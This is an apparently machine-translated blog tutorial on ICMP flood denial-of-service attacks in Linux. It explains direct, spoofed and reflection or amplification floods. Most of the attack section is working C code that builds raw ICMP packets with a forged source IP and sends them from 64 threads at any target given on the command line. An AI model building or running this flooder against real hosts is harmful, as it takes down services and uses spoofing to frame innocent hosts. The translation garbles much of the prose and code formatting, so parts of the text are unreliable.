ICMP flood attack in Linux programming and linuxicmp Flood Attack

ICMP flood attack in Linux programming and linuxicmp Flood Attack
In my previous article "PING implementation in Linux programming", I used the ICMP protocol to implement the PING program. In addition to implementing such a PING program, what other unknown or interesting uses does ICMP have? Here I will introduce ICMP, another famous black technology: ICMP flood attack. ICMP flood attacks are one of the most famous DOS (Denial of Service) attacks. One is a favorite attack method by hackers. Here, we aim to deepen our understanding of ICMP, I also tried to write an ICMP flood attack Applet based on ICMP. Flood attack refers to the network behavior that uses computer network technology to send a large number of useless data packets to the target host, so that the target host is busy processing useless data packets and cannot provide normal services. ICMP flood attack: as the name suggests, it sends a flood ping packet to the target host so that the target host is busy processing the ping packet and cannot process other normal requests, this is like a flood ping packet that drowned the target host. The following three knowledge reserves are required for ICMP flood attacks:

• DOS attack Principle
• In-depth understanding of ICMP
• Original socket programming skills
  
  

I. Principles of ICMP flood attacksICMP flood attacks are based on ping, but the ping program rarely causes the goal and downtime. This is because the ping packet sending speed is too slow, for example, in my PING program, the sending rate of the ping packet is limited to 1 second. The target host can process more than enough ping packets. Therefore, to cause a "Flood" phenomenon, we must increase the packet sending rate. Three ICMP flood attacks are introduced here: (1) Direct flood attacks require competition between the bandwidth of the local host and the bandwidth of the target host, for example, if the network bandwidth of my host is 30 M and the network bandwidth of your host is only 3 M, then the success rate of my flood attack flooding your host will be very high. This attack method requires that the processing capability and bandwidth of the attacked host must be greater than that of the attacked host; otherwise, the host is DoS. Based on this idea, we can use a high-bandwidth and high-performance computer to send multiple ICMP request packets at a time using multiple threads, the target host is busy processing a large number of these packets, resulting in slow speed or even downtime. This method has a major disadvantage: the other party can block the attack source based on the IP address of the ICMP packet, so that the attack cannot continue. (2) Based on direct flood attacks, we disguise the sender's IP address as another IP address. If it is disguised as a random IP address, this allows you to hide your location. If you disguise your IP address as the IP address of another victim, it will cause a "pick-up" situation, the icmp reply packet of victim host 1 is also sent to victim host 2 like a flood. If the administrator of Host 1 wants to check which bastard launched the packet to attack himself, he will check the source address of the ICMP packet, the hacker was originally host 2, so host 2 became the lamb of Dai sin. (3) reflection attacks are more clever than the above two types of attacks. In fact, the three attack modes here are the combined versions and upgraded versions of the first two modes. The attack strategies of the three are a bit like "killing with a knife", and reflection attacks are no longer directly targeted at the target host, instead, let other hosts mistakenly think that the target host is sending an ICMP request packet to them, and then a group of hosts will send an ICMP response packet to the target host, this can cause floods from all directions to overwhelm the target host. For example, if we send an ICMP request packet to other hosts in the LAN and disguise our IP address as the IP address of the destination host, the destination host becomes the focus of ICMP echo. This attack is very concealed, because it is difficult for the victim host to find out who is the attack source. Ii. ICMP flood attack program designHere I want to implement an ICMP flood attack example. Here I want to use method 2 for design. Although method 3's "killing with a knife" is more clever, it is actually further extended by the disguised method of method 2, and the implementation is similar. First, the attack model diagram is given: 1. Group ICMP PacketsThe group package here is not much different from the group package when writing the PING program. The only thing we need to note is that we need to fill in the IP header, because we need to pretend to be the source address to marry people.

Void DoS_icmp_pack (char * packet) {struct ip * ip_hdr = (struct ip *) packet; struct icmp * icmp_hdr = (struct icmp *) (packet + sizeof (struct ip )); ip_hdr-> ip_v = 4; ip_hdr-> ip_hl = 5; ip_hdr-> ip_tos = 0; ip_hdr-> ip_len = htons (ICMP_PACKET_SIZE ); ip_hdr-> ip_id = htons (getpid (); ip_hdr-> ip_off = 0; ip_hdr-> ip_ttl = 64; ip_hdr-> ip_p = PROTO_ICMP; ip_hdr-> ip_sum = 0; ip_hdr-> ip_src.s_addr = inet_addr (FAKE _ IP); // disguise source address ip_hdr-> ip_dst.s_addr = dest; // enter the target host address icmp_hdr-> icmp_type = ICMP_ECHO; icmp_hdr-> icmp_code = 0; icmp_hdr-> icmp_cksum = htons (~ (ICMP_ECHO <8); // note that the checksum calculation is simplified because the data part is 0}

 

2. Build a packet sending thread

Void Dos_Attack () {char * packet = (char *) malloc (ICMP_PACKET_SIZE); memset (packet, 0, ICMP_PACKET_SIZE); struct sockaddr_in to; DoS_icmp_pack (packet);. sin_family = AF_INET;. sin_addr.s_addr = dest;. sin_port = htons (0); while (alive) // global variable for controlling packet sending {sendto (rawsock, packet, ICMP_PACKET_SIZE, 0, (struct sockaddr *) &, sizeof (struct sockaddr);} free (packet); // remember to release the memory}

 

3. Compile the packet sending SwitchThe switch here is simple. It can be implemented using semaphores + global variables. When we press ctrl + c, the attack will be disabled.

void Dos_Sig(){    alive = 0;    printf("stop DoS Attack!\n");}

 

4. overall architectureWe use 64 threads to send packets together. Of course, the number of threads can be greatly increased to increase the attack intensity. However, we only do experiments, and there is no need to do that.

Int main (int argc, char * argv []) {struct hostent * host = NULL; struct protoent * protocol = NULL; int I; alive = 1; pthread_t attack_thread [THREAD_MAX_NUM]; // open 64 threads and send packets at the same time int err = 0; if (argc <2) {printf ("Invalid input! \ N "); return-1;} signal (SIGINT, Dos_Sig); protocol = getprotobyname (PROTO_NAME); if (protocol = NULL) {printf (" Fail to getprotobyname! \ N "); return-1;} PROTO_ICMP = protocol-> p_proto; dest = inet_addr (argv [1]); if (dest = INADDR_NONE) {host = gethostbyname (argv [1]); if (host = NULL) {printf ("Invalid IP or Domain name! \ N "); return-1;} memcpy (char *) & dest, host-> h_addr, host-> h_length);} rawsock = socket (AF_INET, SOCK_RAW, PROTO_ICMP); if (rawsock <0) {printf ("Fait to create socket! \ N "); return-1;} setsockopt (rawsock, SOL_IP, IP_HDRINCL," 1 ", sizeof (" 1 ")); printf ("icmp flood attack start \ n"); for (I = 0; I <THREAD_MAX_NUM; I ++) {err = pthread_create (& (attack_thread [I]), NULL, (void *) Dos_Attack, NULL); if (err) {printf ("Fail to create thread, err % d, thread id: % d \ n", err, attack_thread [I]) ;}}for (I = 0; I <THREAD_MAX_NUM; I ++) {pthread_join (attack_thread [I], NULL); // wait until the thread ends} prin Tf ("icmp attack finishi! \ N "); close (rawsock); return 0 ;}

 

 

Iii. ExperimentIn this experiment, I want to use my own devices for the purpose of learning and want to further understand the network and Protocol applications. Therefore, the attack scope is relatively small, and the time is only a few seconds, does not affect any device. Let's talk about our attack steps: We use host 172.0.5.183 as our attack host, disguise ourselves as host 172.0.5.182, and launch ICMP flood attacks on host 172.0.5.9. At the beginning of the attack, let's take a look at the situation of the "victim. In just five seconds, more than 70 thousand packages were correctly received and delivered for upper-layer processing. I do not dare to do anything more to avoid affecting machine work. When wireshark is used to capture packets, you can see that the amount of ICMP packets is large. The source address of the ICMP packet is 172.0.5.182 (the disguised address). It also returns echo reply to 172.0.5.182. The host 172.0.5.182 will surely think about how to receive so many echo reply packets. The attack experiment is complete. DDOS attacks are more popular now. They are more powerful, more sophisticated, and more difficult to defend. In fact, this DDoS attack is also initiated based on DOS. The specific steps are as follows: 1. the attacker broadcasts the echo request packet to the "amplified network. the attacker specified the source IP address of the broadcast packet as the attacked host. "enlarge the network" and reply echo reply to the attacked host. 4. to form a DDoS attack scenario, here the "Enlarge network" can be understood as a network with many hosts. The operating system of these hosts must support the response of some ICMP request packets whose destination address is the broadcast address. The attack strategy is very subtle. In short, it is to disguise the source address as the IP address of the attack host, and then broadcast it to all hosts. After the host receives the echo request, it returns the packet to the attack host collectively, A scenario where a group can be attacked.